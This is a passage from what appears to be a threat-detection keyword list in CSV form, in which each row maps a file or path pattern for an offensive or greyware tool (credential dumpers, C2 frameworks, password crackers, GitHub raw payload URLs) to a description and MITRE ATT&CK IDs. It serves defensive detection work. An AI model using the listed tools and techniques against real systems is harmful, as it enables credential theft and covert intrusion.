abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.js*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.lnk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.log*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.mac*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.mam*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.msi*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.msp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.nexe*,greyware_tool_keyword,github,Github raw access 
content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.nim*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.otm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.out*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.ova*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pem*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pfx*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pl*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.plx*,greyware_tool_keyword,github,Github raw 
access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.ppk*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.ps1*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.psm1*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pub*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.py*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.pyc*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A 
-*/github.com/*/raw/main/*.pyo*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.rar*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.raw*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.reg*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.rgs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.RGS*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.run*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.scpt*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive 
!,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.script*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.sct*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.sh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.ssh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.sys*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.teamserver*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.temp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.tgz*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks 
of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.tmp*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.vb*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.vbs*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.vbscript*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.ws*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.wsf*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.wsh*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.X86*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware 
tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.X86_64*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.xlam*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.xlm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.xlsm*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/github.com/*/raw/main/*.zip*,greyware_tool_keyword,github,Github raw access content - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*/GithubC2.git*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,1,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*/gkrellm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/glit.git*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,1,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*/glit-cli*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*/glit-core*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -*/globeimposter.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/gmailC2.exe*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,1,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*/gMSA_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/gMSADumper*,offensive_tool_keyword,gMSADumper,Lists who can read any gMSA password blobs and parses them if the current user has access.,T1552.001 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/micahvandeusen/gMSADumper,1,1,N/A,N/A,2,190,34,2023-08-23T13:32:49Z,2021-04-10T00:15:24Z -*/GMSAPasswordReader.git*,offensive_tool_keyword,GMSAPasswordReader,Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/rvazarkar/GMSAPasswordReader,1,1,N/A,7,2,103,23,2023-02-17T14:37:40Z,2020-01-19T19:06:20Z -*/gobuster.git*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - 
TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/gobuster/*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/gobusterdir/*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/gobusterdns/*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/gobustergcs/*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/gocrack.git*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,1,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/gocrack/.hashcat*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential 
Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/gocrack/server*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/gocrack_server*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/gocrack_worker*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/gocrack-1.0.zip*,offensive_tool_keyword,gocrack,GoCrack is a management frontend for password cracking tools written in Go,T1110 - T1021.001,TA0006 - TA0001,N/A,N/A,Credential Access,https://github.com/mandiant/gocrack,1,0,N/A,9,10,1074,271,2023-10-03T21:43:08Z,2017-10-23T14:43:59Z -*/goDoH.git*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*/godoh/*,offensive_tool_keyword,godoh,godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.,T1071 - T1001 - T1008 - T1070 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/sensepost/godoh,1,1,N/A,10,10,701,122,2023-02-25T06:31:07Z,2018-10-23T07:24:04Z -*/GoFetch.git*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,1,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*/golang_c2.git*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,1,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*/GoldenGMSA.git*,offensive_tool_keyword,GoldenGMSA,GolenGMSA tool for working with GMSA passwords,T1003.004 - T1078.003 - T1059.006,TA0006 - TA0004 - TA0002,N/A,N/A,Credential Access,https://github.com/Semperis/GoldenGMSA,1,1,N/A,7,2,113,17,2023-07-03T09:35:48Z,2022-02-03T10:32:05Z -*/goMatrixC2.git*,offensive_tool_keyword,goMatrixC2,C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.,T1090 - T1027 - T1071,TA0011 - TA0009 - TA0010,N/A,N/A,C2,https://github.com/n1k7l4i/goMatrixC2,1,1,N/A,10,10,0,2,2023-09-11T10:20:41Z,2023-08-31T09:36:38Z -*/go-mimikatz*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/vyrus001/go-mimikatz,1,1,N/A,10,6,593,105,2022-09-08T18:14:20Z,2015-10-22T08:43:38Z -*/GONET-Scanner/*,offensive_tool_keyword,GONET-Scanner,port scanner and arp discover in go,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/GONET-Scanner,1,1,N/A,N/A,1,72,18,2022-03-10T04:35:58Z,2022-02-02T19:39:09Z -*/GoodSync-vsub-Setup.exe*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,1,N/A,9,10,N/A,N/A,N/A,N/A -*/goPassGen.git*,offensive_tool_keyword,goPassGen,Easily-guessable Password Generator for Password Spray Attack,T1110 - T1110.003,TA0006 ,N/A,N/A,Exploitation tools,https://github.com/bigb0sss/goPassGen,1,1,N/A,8,1,20,3,2020-06-04T23:13:44Z,2020-06-04T22:33:37Z -*/gopher-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/gophish.db*,offensive_tool_keyword,gophish,Open-Source Phishing Toolkit,T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/gophish/gophish,1,1,N/A,10,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z -*/gophish/*,offensive_tool_keyword,gophish,Open-Source Phishing Toolkit,T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/gophish/gophish,1,1,N/A,10,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z -*/gorsair.go*,offensive_tool_keyword,Gorsair,Gorsair hacks its way into remote docker containers that expose their APIs,T1552,TA0006,N/A,N/A,Exploitation tools,https://github.com/Ullaakut/Gorsair,1,1,N/A,N/A,9,825,74,2023-09-09T13:18:33Z,2018-08-02T16:49:14Z -*/go-secdump.git*,offensive_tool_keyword,go-secdump,Tool to remotely dump secrets from the Windows registry,T1003.002 - T1012 - T1059.003,TA0006 - TA0003 - TA0002,N/A,N/A,Credential Access,https://github.com/jfjallid/go-secdump,1,1,N/A,10,1,81,7,2023-05-02T15:01:10Z,2023-02-23T17:02:50Z -*/gosecretsdump*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*/Gotato.git*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,1,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*/gotato.go*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,1,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*/goZulipC2.git*,offensive_tool_keyword,goZulipC2,C2 leveraging Zulip Messaging Platform as Backend.,T1090 - T1090.003 - T1071 - T1071.001,TA0011 - TA0009,N/A,N/A,C2,https://github.com/n1k7l4i/goZulipC2,1,1,N/A,10,10,5,2,2023-08-31T12:06:58Z,2023-08-13T11:04:20Z -*/GPOddity.git*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*/GPOddity/*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,1,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*/gpp-decrypt*,offensive_tool_keyword,gpp-decrypt,Decrypt the given Group Policy Preferences,T1552.002 - T1212,TA0009 - TA0006,N/A,N/A,Credential Access,https://gitlab.com/kalilinux/packages/gpp-decrypt,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*/gpsd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
